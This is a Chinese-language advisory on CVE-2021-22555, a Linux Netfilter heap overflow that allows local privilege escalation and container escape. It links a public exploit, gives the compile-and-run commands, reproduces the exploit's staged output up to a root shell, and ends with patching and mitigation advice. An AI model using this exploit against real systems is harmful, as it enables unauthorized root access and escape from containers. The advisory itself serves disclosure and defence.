CVE-2021-22555 Linux Netfilter 權限提升漏洞
漏洞描述
近日,互聯網公開了Linux Netfilter權限提升漏洞的POC及EXP,相關CVE編號:CVE-2021-22555。該漏洞在kCTF中被用于攻擊kubernetes pod容器實現虛擬化逃逸,該漏洞已在Linux內核代碼中存在15年,Netfilter是Linux 2.4.x引入的一個子系統,它作為一個通用的、抽象的框架,提供一整套的hook函數的管理機制,使得諸如數據包過濾、網絡地址轉換(NAT)和基于協議類型的連接跟蹤成為了可能。Linux Netfilter模塊在實現IPT_SO_SET_REPLACE(或IP6T_SO_SET_REPLACE)setsockopt時存在堆越界寫入漏洞,本地攻擊者通過該漏洞實現權限提升。
漏洞危害
攻擊者可以通過利用此漏洞進行本地權限提升與容器逃逸
漏洞影響
一個影響2006年(Linux kernel v2.6.19-rc1 發布)至今(Linux kernel v5.12-rc8)的所有Linux內核版本的漏洞,可導致本地提權與容器逃逸
漏洞復現
EXP下載地址:https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555
上傳EXP到目標機器上,執行以下命令進行編譯并進行提權
gcc -m32 -static -o exploit exploit.c
./exploit
theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#
漏洞修復
1、漏洞修復建議
建議受影響的用戶及時升級 Linux 內核到安全版本
2、臨時緩解措施:
根據RedHat建議,用戶可通過以下命令禁止非特權用戶執行CLONE_NEWUSER、CLONE_NEWNET來緩解該漏洞帶來的影響:
echo 0 > /proc/sys/user/max_user_namespaces
)
)
—— Ajax 案例)
)
)